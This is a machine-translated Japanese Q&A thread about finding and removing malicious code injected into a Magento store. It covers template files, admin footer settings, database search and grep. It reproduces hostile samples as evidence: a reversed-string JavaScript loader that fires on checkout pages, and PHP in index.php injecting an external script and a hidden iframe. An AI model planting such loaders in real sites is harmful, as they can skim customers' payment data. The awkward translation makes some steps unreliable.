bodyタグの直後に挿入された悪意のあるスクリプトがあり、削除するファイルがわからないため、管理ツールやテンプレートファイルのどこからでもチェックしています。Magentoでbodyタグの後に挿入されたスクリプトを削除するには?
if((new
RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))
{document.write('>tpircs/<>"sj.tekramroced/crs/knil.sj-
knil//:sptth"=crs tpircs<'.split("").reverse().join(""))};
してください以下しようと近づい
I Magentoのにサードパーティのスクリプトを除去するために、以下のアプローチをお勧めします:
>アプローチ1.してくださいウイルスは、このようになります。あなたのテーマに行くアプリ/デザイン/フロントエンド/ Yourtheme /デフォルト/テンプレート/ページ/、openファイルを次のコードとコメントを見つけ、キャッシュをクリアして店舗をチェックしてください。
<?php echo $this->getAbsoluteFooter() ?>
1column.phtml
2columns-left.phtml
2columns-right.phtml
3columns.phtml
すべてのその他のコードがgetAbsoluteFooter下に来ます()関数、
>アプローチ2: GO管理パネル一般>デザイン>フッター>その他のHTML
>アプローチ3:ゴー/ page.xmlファイルをlocal.xmlし、コードの下にこれをチェックするために、あるかもしれませんこのように、同じファイルに追加
<block type="core/text_list" name="after_body_start" as="after_body_start" translate="label">
<label>Page Top</label>
、それはあなたのために役立ちます願っています。
スクリプトの名前がわかっている限り、これらの悪質なスクリプトを簡単に取り除くことができます。
これらのスクリプトの多くは自分のウェブサイトに挿入されていましたが、そのほとんどはドメインhttp://siteverification.onlineを指すスクリプトとiframeでした。
私はMagentoの専門家ではないが、私はその後、唯一の2ヶ所から来ることができることを考え出し:
私はMySQLを使用しています.PhpMyAdminがインストールされているので、Search関数を利用しました。この関数は、データベースのすべてのテーブルのすべてのフィールドを検索できます。私はちょうどsiteverification.onlineを検索し、いくつかのエントリを見つけて、それらを削除しました。ファイルシステムについては
、私はSSH経由でログオンし、ちょうど全体のMagentoのウェブサイトのファイルシステムを検索し、このように:私の場合は
$ grep -r "siteverification.online" /var/www/magento-project
./index.php:print('<script type="text/javascript" src="http://siteverification.online/lib/status.js"></script>');
./index.php:print('<iframe src="http://siteverification.online/" frameborder="0" width="0" height="0"></iframe>');
それはいくつかのPHPコードはindex.phpに注入したことが判明しました。しかし、コードが他のphpやhtmlファイルに挿入された場合、検索は再帰的であるため(-rフラグ)、これも同様に検索されます。
これだけです。私はMagentoのファイルシステムとデータベース構造についても理解していませんが、これらの根本的な検索方法を使用すると、数分間ですべてのマルウェアを取り除くことができます。
その他のコードでチェックしましたか?管理パネルで? –
それ以外のHTMLは、 'system-> configuration-> design-> footer->'その他のHTML'の 'copyright'チェックの下にあります。これは、そこにある' code/virus' –